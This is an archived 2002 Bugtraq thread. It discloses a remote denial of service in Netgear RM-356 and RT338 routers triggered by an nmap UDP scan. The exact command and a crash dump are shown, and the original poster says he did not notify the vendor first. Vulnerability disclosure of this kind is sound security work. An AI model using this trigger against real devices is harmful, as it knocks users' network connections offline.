Bugtraq mailing list archives
Re: Remote DoS in Netgear RM-356
From: Simple Nomad <thegnome () nmrc org>
Date: Fri, 15 Feb 2002 14:11:06 -0500 (EST)
My Netgear RT338, which is an ISDN router, falls over with a udp scan. It does clear on its own, but not before dropping the connection. Interestingly enough SNMP is not running on it -- it just choked on the scan, but seems to handle a tcp scan ok. This would suggest that the problem may lie with the filtering code (most of the SOHO Netgear devices have some simple acls for filtering traffic) or with the buffers that handle the packets. My testing was limited -- I did not test from the outside because the udp scans fuck up some of the equipment at my ISP ;-) but it did drop the connection with a udp scan from the inside. I suspect all the RT and RM devices from Netgear may fall into this category. - Simple Nomad - if we were priests - - thegnome () nmrc org - we would hack - - thegnome () razor bindview com - the mind of god - On Fri, 15 Feb 2002, Ben Ryan wrote:
g'day all; found a denial of service in the IP stack of the Netgear RM-356. This is your typical `internet gateway in a box'. Small businesses love 'em. this isn't exactly 'end of the internet' stuff, so I haven't bothered to do any coochie-coo vendor-informed stuff. Write bad code and sell it, stand up and be counted for your mistakes. Even simple testing would have uncovered this. Using lx252 and nmap-254b30, I performed a udp scan against the netgear nat box, this device has a V90 modem WAN interface. cmd line was: snuff# nmap -sU 210.9.238.103 -T5 It seems to be 161/UDP that's vulnerable... what a coincidence :) TCP connect() scans seem to be ok. Upon receipt of the nmap probe, the box does a crashdump to console. Perhaps this is an overflow? IANAasmdev :) All your RM-356 are belong to us :) Menu 24.2.1 - System Maintenance - Information Name: *******_netgear Routing: IP RAS F/W Version: V2.21(I.03) | 3/30/2000 MODEM 1 F/W Version: V2.210-V90_2M_DLS Country Code: 244 LAN Ethernet Address: 00:a0:c5:e3:**:** IP Address: 192.168.0.1 IP Mask: 255.255.255.0 DHCP: Server CRASHDUMP:: 54f7a0: 00 54 f7 a8 00 21 e9 38 00 54 f8 10 00 21 e9 38 .T...!.8.T...!.8 54f7b0: 00 00 00 07 00 41 37 bc 00 2b 09 ca 00 00 00 00 .....A7..+...... 54f7c0: 00 55 24 4c 00 2b 09 b2 00 00 00 00 00 55 24 4c .U$L.+.......U$L 54f7d0: 00 00 00 05 00 00 00 00 00 21 16 24 00 57 26 04 .........!.$.W&. 54f7e0: 00 58 5e e8 00 21 16 24 00 00 26 04 00 21 16 24 .X^..!.$..&..!.$ 54f7f0: 00 41 20 00 00 54 f8 10 00 21 ea 34 00 41 20 00 .A ..T...!.4.A . 54f800: 00 00 00 07 ff ff ff ff 00 54 f8 10 00 21 e6 6e .........T...!.n 54f810: 00 54 f8 2c 00 21 e6 6e 00 41 37 bc ff ff ff ff .T.,.!.n.A7..... 54f820: ff ff 20 04 00 5e 2e 60 00 40 f7 20 00 54 f8 68 .. ..^.`.@. .T.h 54f830: 00 21 b0 00 00 00 00 01 00 2b 09 ca ff ff ff ff .!.......+...... 54f840: 00 00 00 07 00 2b 09 b2 00 5e 2e 60 00 00 00 00 .....+...^.`.... 54f850: ff ff ff ff 00 00 00 00 00 00 00 00 00 54 f9 9c .............T.. 54f860: 00 5e 2e 60 00 00 00 00 00 54 f8 a8 00 21 a8 1a .^.`.....T...!.. 54f870: 00 00 00 07 ff ff ff ff 00 5e 2e 60 00 00 00 00 .........^.`.... 54f880: 00 00 00 08 00 00 00 00 00 00 00 21 00 00 00 24 ...........!...$ 54f890: 00 00 00 00 00 54 f9 9c 00 5f ec d0 00 55 24 4c .....T..._...U$L 54f8a0: 00 55 24 4c 00 5e 2e 60 00 54 f8 fc 00 23 b8 42 .U$L.^.`.T...#.B Boot Module Version : 4.40. Built at Wed Feb 23 14:00:29 2000 ________.-~-.________ Ben Ryan, MCP Network Engineer Lansys Technologies Bendigo, Victoria Australia Phone +61-[0]417 502061 email: ben () bssc edu au URL: http://thrasher.impulse.net.au/index.htm
Current thread:
- Remote DoS in Netgear RM-356 Ben Ryan (Feb 15)
- Re: Remote DoS in Netgear RM-356 Simple Nomad (Feb 18)